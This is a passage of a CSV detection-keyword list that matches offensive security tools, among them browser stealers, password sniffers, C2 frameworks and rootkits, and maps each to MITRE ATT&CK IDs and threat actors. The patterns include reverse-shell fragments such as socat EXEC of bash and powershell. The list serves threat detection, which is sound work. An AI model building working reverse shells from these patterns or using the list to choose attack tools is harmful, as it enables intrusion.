installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","59788" "*sneaky_gophish*",".{0,1000}sneaky_gophish.{0,1000}","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","N/A","10","2","180","58","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z","59789" "*sniff.su/Intercepter-NG*",".{0,1000}sniff\.su\/Intercepter\-NG.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59790" "*SniffAir*",".{0,1000}SniffAir.{0,1000}","offensive_tool_keyword","SniffAir","SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. 
The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.","T1530 - T1170 - T1059 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Tylous/SniffAir","1","1","N/A","network exploitation tool","N/A","10","1206","167","2020-10-14T04:00:27Z","2017-02-20T18:32:32Z","59791" "*Sniffed AS-REQ from *",".{0,1000}Sniffed\sAS\-REQ\sfrom\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","59792" "*Sniffer waiting for AS-REQ*",".{0,1000}Sniffer\swaiting\sfor\sAS\-REQ.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","59793" "*sniffer.py*",".{0,1000}sniffer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59794" "*sniffer_dump */tmp/*.pcap*",".{0,1000}sniffer_dump\s.{0,1000}\/tmp\/.{0,1000}\.pcap.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","59795" "*sniffer-master.zip*",".{0,1000}sniffer\-master\.zip.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","N/A","8","769","67","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z","59796" "*sniffers.llmnr_sniffer*",".{0,1000}sniffers\.llmnr_sniffer.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","59797" 
"*SnifferSpoofer*",".{0,1000}SnifferSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59798" "*sniffglue*",".{0,1000}sniffglue.{0,1000}","offensive_tool_keyword","sniffglue","Secure multithreaded packet sniffer","T1040 - T1041 - T1046 - T1057 - T1071.001","TA0009 - 
TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/sniffglue","1","0","N/A","N/A","N/A","10","1186","99","2025-01-24T10:48:27Z","2017-09-12T16:26:24Z","59799" "*SniffPass.exe*",".{0,1000}SniffPass\.exe.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59800" "*sniffpass-x64.zip*",".{0,1000}sniffpass\-x64\.zip.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59801" "*snmp_default_pass.txt*",".{0,1000}snmp_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59802" "*snmpwn *passwords.txt*",".{0,1000}snmpwn\s.{0,1000}passwords\.txt.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","59809" "*snmpwn.rb* --hosts *",".{0,1000}snmpwn\.rb.{0,1000}\s\-\-hosts\s.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","59810" "*SOAPHound PoC 1.0.1-beta*",".{0,1000}SOAPHound\sPoC\s1\.0\.1\-beta.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","59812" "*SOAPHound.exe *",".{0,1000}SOAPHound\.exe\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","59813" "*SOAPHound.Processors*",".{0,1000}SOAPHound\.Processors.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","59814" "*socat - TCP_LISTEN:31337*",".{0,1000}socat\s\-\sTCP_LISTEN\:31337.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other.
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","59815" "*socat TCP:*:* EXEC:""/bin/bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59822" "*socat TCP:*:* EXEC:""/bin/sh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59823" "*socat TCP:*:* EXEC:""bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59824" "*socat TCP:*:* EXEC:""cmd""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""cmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59825" "*socat TCP:*:* 
EXEC:""powershell""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""powershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59826" "*socat TCP:*:* EXEC:""pwsh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""pwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59827" "*socat TCP:*:* EXEC:""zsh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""zsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59828" "*socat TCP:*:* EXEC:sh*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:sh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59829" "*socat TCP:*:* EXEC:'sh*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\'sh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","59830" "*socat tcp4-listen:1337*",".{0,1000}socat\stcp4\-listen\:1337.{0,1000}","offensive_tool_keyword","socat","listening on port 1337 - observed in various malware and PoC exploitation tools","T1049 - T1021.001 - T1572","TA0002 - TA0011 - TA0040","N/A","Scattered Spider*","C2","N/A","1","0","#linux","N/A","8","6","N/A","N/A","N/A","N/A","59832" "*socat.exe -d -d TCP4:*",".{0,1000}socat\.exe\s\-d\s\-d\sTCP4\:.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","N/A","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","59837" "*Social Engineer Toolkit*",".{0,1000}Social\sEngineer\sToolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","59838" "*social_engineering/web_cloner*",".{0,1000}social_engineering\/web_cloner.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework.
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","59839" "*SocialPwned.git*",".{0,1000}SocialPwned\.git.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","59840" "*socialpwned.py*",".{0,1000}socialpwned\.py.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","59841" "*socialpwned_*.txt*",".{0,1000}socialpwned_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","59842" "*sock.send(""""I AM A BAD BOY"""")*",".{0,1000}sock\.send\(\""I\sAM\sA\sBAD\sBOY\""\).{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","59843" "*Sock5/Sock5RServer.h*",".{0,1000}Sock5\/Sock5RServer\.h.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","59844" "*SOCK5Server.exe*",".{0,1000}SOCK5Server\.exe.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","59845" "*SOCK5Server_v0.0.1.zip*",".{0,1000}SOCK5Server_v0\.0\.1\.zip.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","59846" "*socket = new System.Net.Sockets.Socket(System.Net.Sockets.AddressFamily.InterNetwork, System.Net.Sockets.SocketType.Stream, 
System.Net.Sockets.ProtocolType.Tcp)*",".{0,1000}socket\s\=\snew\sSystem\.Net\.Sockets\.Socket\(System\.Net\.Sockets\.AddressFamily\.InterNetwork,\sSystem\.Net\.Sockets\.SocketType\.Stream,\sSystem\.Net\.Sockets\.ProtocolType\.Tcp\).{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#content","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","59847" "*socket.gethostbyname(NO_IP_HOST)*",".{0,1000}socket\.gethostbyname\(NO_IP_HOST\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","59849" "*SocketHijacking.*",".{0,1000}SocketHijacking\..{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","59850" "*Socks server for reGeorg HTTP(s) tunneller*",".{0,1000}Socks\sserver\sfor\sreGeorg\sHTTP\(s\)\stunneller.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","59851" "*socks*127.0.0.1 9050*",".{0,1000}socks.{0,1000}127\.0\.0\.1\s9050.{0,1000}","offensive_tool_keyword","proxychains","(TOR default) proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","59852" "*SOCKS5 server active*",".{0,1000}SOCKS5\sserver\sactive.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#content","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","59853" "*socks5_exe.exe*",".{0,1000}socks5_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","59854" "*socks5h://127.0.0.1:9050*",".{0,1000}socks5h\:\/\/127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library 
which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","59855" "*--socks5-proxy socks5*",".{0,1000}\-\-socks5\-proxy\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","59856" "*--socks5-proxyp socks5*",".{0,1000}\-\-socks5\-proxyp\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","59857" "*--socks5-proxyu socks5*",".{0,1000}\-\-socks5\-proxyu\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","59858" "*socky whoami*",".{0,1000}socky\swhoami.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 
Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/Winsocky","1","0","N/A","N/A","10","10","98","18","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z","59859" "*SOFTWARE\$77config*",".{0,1000}SOFTWARE\\\$77config.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#registry","registry","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","59862" "*SOFTWARE\$77config\*",".{0,1000}SOFTWARE\\\$77config\\.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#registry","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","59863" "*Software\NirSoft\SniffPass*",".{0,1000}Software\\NirSoft\\SniffPass.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A","59867" 
